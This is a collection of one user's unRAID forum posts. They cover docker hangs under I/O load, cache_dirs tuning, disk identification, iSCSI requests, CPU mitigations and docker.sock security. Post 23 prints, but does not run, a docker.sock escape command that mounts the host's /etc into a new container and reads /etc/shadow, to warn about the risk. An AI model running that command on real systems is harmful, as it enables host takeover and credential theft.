Everything posted by NAS

  1. NAS

    Better Defaults

    This is a pretty big deal if it is true. I wouldn't know how to pull this off right now though, so more details are required.
  2. I think I can actually replicate this now. If I mount a USB drive and copy files continuously to my SSD cache drive, which is also the location of my docker loopback image, then after a few minutes docker stops responding, which obviously ruins the web GUI as well. I routinely copied files this way in all previous versions, the cache drive seems fine (it's pretty new), and there are no errors in any log that I can see. The SSD is attached to a motherboard SATA port directly. I am pretty sure it is I/O wait, as load skyrockets. Will wait and see if it's an "only me" problem.
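If anyone else wants to confirm the I/O-wait theory while reproducing, here is a rough sketch that reads the iowait share straight out of /proc/stat (field order per proc(5)); `iowait_pct` is a made-up helper name, and note this is the since-boot average, so watch for it climbing during the copy rather than treating the absolute number as gospel:

```shell
# One-shot iowait percentage, computed from the aggregate "cpu" line
# of /proc/stat (fields: user nice system idle iowait ...).
# This is cumulative since boot; sample it repeatedly during the copy
# and watch the trend.
iowait_pct() {
    read -r _cpu user nice system idle iowait _rest < /proc/stat
    total=$((user + nice + system + idle + iowait))
    echo $((100 * iowait / total))
}

iowait_pct
```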
  3. Except if you are a company, any public body, a registered non-profit, anyone with liability cover, any organization that has to comply with ISO accreditation (or worldwide equivalents), anyone subject to independent audits, anyone covered by the EU GDPR, or, or... Context is important, and whilst most people here are home users, plenty of unRAID users are not. Nice addon. I really mean that. It absolutely has its place, but the default advice should always be "be secure unless you really, really understand the risks of not being".
  4. Yeah, I don't think it is there either, but I suspect this thread will hang around for years and hit the first page on Google since it's so niche. (Anyone else find themselves answering their own question via Google in old forum posts? I do, more than I care to admit.)
  5. I faced an odd issue where the web GUI would load, but not completely. Specifically, the dash wouldn't load, but the disk view would, excluding the action buttons at the bottom. The Docker view wouldn't load at all, but settings would. Docker containers did not work, or were super slow (hard to say). Manually restarting one container instantly kicked the web GUI and docker back into a working state. I can't replicate it.
  6. @limetech can you confirm whether this is indeed in `proc`, just so I can close this thread down as solved and anyone else who happens upon it knows the definitive answer.
  7. hehe. Out of curiosity, I never did find a way to do this by querying /proc. Any idea if this data is in there somewhere?
  8. That is excellent, thank you very much. I would not have thought to do it like this at all.
  9. I have tried, I think, all the obvious ways, although I still suspect I missed the one obvious one that works:

     lsblk /dev/md4
     NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
     md4    9:4   0 3.7T  0 md   /mnt/disk4
  10. Sorry if this is obvious, but I can't quite nail it down. For something I am working on I need to find the device name and disk serial, starting from knowing either "/mnt/disk4" or "/dev/md4" in the shell. Does anyone know how to get, for example, "/dev/sdb1" from this?
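Not an authoritative answer, but a sketch of the two hops I'd try first (assumes util-linux's `findmnt` and udev are available; `mount_to_device` and `device_serial` are made-up helper names). The md4 → sdb1 step is the part this doesn't solve, which is the open question above:

```shell
# mount point -> backing block device (e.g. /mnt/disk4 -> /dev/md4)
mount_to_device() {
    findmnt -n -o SOURCE "$1"
}

# block device -> drive serial, as udev recorded it (empty if udev
# has no record, e.g. for md devices)
device_serial() {
    udevadm info --query=property --name="$1" 2>/dev/null \
        | awk -F= '$1 == "ID_SERIAL_SHORT" { print $2 }'
}

mount_to_device /   # any mounted path works; /mnt/disk4 on unRAID
```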
  11. I thought I was going mad. This is most certainly a thing.
  12. tl;dr: to fully fix this Intel garbage, users are going to pay a performance price. The price varies wildly based on user workloads and is basically impossible to predict; however, I have been in conversations where some devops have seen insane edge-case performance drops. I would suggest the right way to do this is to fix it by default but document an opt-out for those who want to accept the risk, because it is not possible for normal humans to really understand this from beginning to end.
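For anyone wanting to see what their own kernel decided, recent kernels (4.15+) expose the applied mitigations under sysfs; a minimal sketch (`mitigation_status` is a made-up name, and the function is deliberately silent on kernels that predate the interface):

```shell
# Print one line per known CPU vulnerability and the mitigation the
# kernel chose for it, e.g. "meltdown: Mitigation: PTI".
mitigation_status() {
    for f in /sys/devices/system/cpu/vulnerabilities/*; do
        [ -r "$f" ] && printf '%s: %s\n' "${f##*/}" "$(cat "$f")"
    done
    return 0
}

mitigation_status
```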
  13. So one of the problems with cache_dirs is that it is, at its core, a hack. Quite a bit of the user setup is based on educated guesswork, and very little info is presented or logged to show how well it is functioning, e.g. how many files are being cached, or how often disks are being woken. Most of the performance feedback we can gather is based on timings. Some ideas:

      • track timings and present them as a time-based graph for easier analysis
      • store timings outside of rotating logs for easier long-term analysis
      • estimate memory usage

      In theory we can reasonably estimate maximum memory requirements by counting potential inode entries and multiplying by the inode size. This would allow what-if scenarios to be built where each share is presented in terms of estimated memory requirements, and if we do end up adding a per-share depth option the user can tune their settings (and potentially reorganize their data) to cache as efficiently as possible. This will take some reading and experimentation, and unless someone is capable of reading the kernel code to understand how cache pressure impacts this it will always be worst case... but to my eye this is the direction to go.
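The "estimate memory usage" idea can be sketched cheaply from the shell. The ~1 KiB per entry figure below is my assumption, not a measured number (dentry + cached inode + slab overhead vary by kernel), so treat the result as a worst-case ceiling for what-if comparisons between shares, and `estimate_cache_kib` is a made-up helper name:

```shell
# Worst-case guess at how much RAM caching one share to a given depth
# could pin: number of directory entries times an assumed ~1 KiB each.
estimate_cache_kib() {
    share="$1"
    depth="${2:-9999}"
    entries=$(find "$share" -maxdepth "$depth" 2>/dev/null | wc -l)
    echo "$share: $entries entries, roughly $entries KiB worst case"
}

# compare the same share at different depths to find the tipping point
estimate_cache_kib /tmp 2
```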
  14. Sorry to be so long replying. I wanted to wait until I was sure my assumptions fixed the issue before I posted again, and time got away from me. tl;dr: my fundamental issue was that at some point the addon update dropped the includes but not the excludes, so it appeared to be working but was actually doing nothing. Changing the settings mostly fixed the issue. I am keen to throw some other ideas into the pot, but the most important matter at hand is to deal with the PRs. Forking and getting users to manually pull addons from the internet is suboptimal. There has been some discussion on this above; where are we today with it?
  15. NAS

    ISCSI Support

    I do see the point you are making, but statistically it does not matter: any sufficiently large group, when asked "what they want", will tend towards 100% coverage of any set of options. Charted, this will obviously be a histogram, but a forum is a very blunt tool for this kind of requirements gathering. You will have much better results if you either: ask users for their use cases and do the requirements analysis in reverse from there; or estimate the base requirements internally, offer a trial working set of features, and follow on by capturing the use cases people aren't able to meet with the trial, deciding from there if they are cases you want to support. The second option is what I would do, as it allows you to internally debate the 10%-effort/90%-gain tipping point.
  16. NAS

    ISCSI Support

    Is there a way to add basic support as a trial? I don't know the effort involved, but I do know that asking people on the internet what they "need" is generally a bad idea; much like trying to herd cats with an error margin greater than the sample set, you will just tend towards "everything" the more people you ask.
  17. Something weird is going on. I can see cache_dirs running, and even though I now have /bin/bash /usr/local/emhttp/plugins/dynamix.cache.dirs/scripts/cache_dirs -e appdata -l off -p 0 -D 9999, the cache seems to perpetually need disks spun up. How would you like me to debug this further? Update: is it this obvious: have all my cache includes been removed, so I end up with exclusions only and no inclusions, or is there an implied * include?
  18. Having a hard time learning to love the new adaptive feature. The idea sounds great in theory, but I have found that cache_dirs effectively doesn't work any more, with all lower-level folder access waking up some disks. Certainly this will be user-specific, but without feedback on how the adaptive caching is working (ideally showing depth per top-level folder, timings, etc.) it seems to me people would be better served with a default manual setup. On this note, I don't know how other people do this, but my ideal use case is to be able to set a global minimum depth with exceptions per folder. Currently I exclude 30% of my array, as the data is rarely accessed but holds very large numbers of files... however, whilst this helps cache_dirs, a single stray click on one of these top-level folders busts the cache and disks spin up. I would love to get into a discussion on how we could enhance this feature, as without a word of a lie it is the most critical one I operate.
  19. The "Update all" in 6.5.3 works well (great work), but it is a bit unintuitive that there are scenarios where the interface shows that some/most/all containers have an update available yet the "Update all" button is not there.
  20. NAS

    ISCSI Support

    Coincidentally, I was thinking about this the other day along with S3, and it seems, to me at least, that whilst everyone will make a case for features they want, adding protocol support is the one sure-fire way to attract new users. I cannot quantify how many users this would be, but we can say that every user in the world who wants iSCSI or S3 doesn't buy unRAID. Seems like an "easy" win to me.
  21. I can't see anything, but I wanted to check to make sure since this is such a long thread. I am in the process of migrating to XFS, and I have found one RFS disk that will mount happily with unRAID but won't mount at all with UD. dmesg shows:

      [Tue Jun 19 15:40:36 2018] REISERFS warning (device sdc1): sh-2021 reiserfs_fill_super: can not find reiserfs on sdc1

      so before I get into this, are there any known relevant issues? Update: well, it turns out it's pretty obvious why UD can't mount this reiser disk... that's because it is xfs:

      # file -sL /dev/sdc*
      /dev/sdc: DOS/MBR boot sector; partition 1 : ID=0xee, start-CHS (0x0,0,2), end-CHS (0x3ff,255,63), startsector 1, 4294967295 sectors, extended partition table (last)
      /dev/sdc1: SGI XFS filesystem data (blksz 4096, inosz 512, v2 dirs)

      Any ideas why UD is trying to mount an XFS disk as ReiserFS?
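For anyone hitting the same confusion, a hedged sketch of how to sanity-check what a partition actually holds before any tool picks a mount type, built on the same `file -sL` trick as above (`check_fs` is a made-up helper name, not part of UD):

```shell
# Classify a device or image by its on-disk signature, independent of
# what any mount helper guesses. Falls through to "unknown" if file
# is missing or finds no filesystem signature.
check_fs() {
    dev="$1"
    sig=$(file -sL "$dev" 2>/dev/null)
    case "$sig" in
        *"XFS filesystem"*) echo "$dev: xfs" ;;
        *ReiserFS*)         echo "$dev: reiserfs" ;;
        *)                  echo "$dev: unknown ($sig)" ;;
    esac
}

check_fs /dev/null   # a device with no filesystem signature
```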
  22. https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/ "After tweeting this article out @benhall pointed out that actually the ro setting on the volume mount doesn’t have a lot of effect in terms of security. An attacker with ro access to the socket can still create another container and do something like mount /etc/ into it from the host, essentially giving them root access to the host. So bottom line is don’t mount docker.sock into a container unless you trust its provenance and security…" In general security terms, you know things are fundamentally not right with a generic approach when you're herding this many cats just to make it less insecure... not secure... less evil.
  23. There is always a risk of a breakout from any container, but this is the holy-grail hack of such a system. To be clear about what this sock feature does: essentially it gives the container root access, as a member of the docker group, on the HOST machine... not the container, the host. This is a specific feature required by the traefik container and not required by almost any other container. It is very, very, very rare, and for good reason.
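To make the risk concrete, here is a hedged illustration of the escape the article describes; the image names are placeholders, and the block deliberately only prints the command rather than executing it, because on a real host this would read root-only files:

```shell
# The :ro flag protects the socket *file*, not the API behind it.
# Anything that can talk to the socket can ask the daemon to start a
# fresh container with any host path bind-mounted inside it.
attack='docker run --rm -v /var/run/docker.sock:/var/run/docker.sock:ro \
  docker:cli \
  docker run --rm -v /etc:/host-etc alpine cat /host-etc/shadow'

# printed rather than executed on purpose
printf '%s\n' "$attack"
```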
  24. No, I am specifically referring to the exceptional requirement of this container to activate the docker socket feature. This is very unusual.
  25. Long story short: if someone roots a container with the docker socket enabled, it's pretty much game over. This is why, much as I think traefik is a beautiful piece of engineering, it is built on a hill of sand.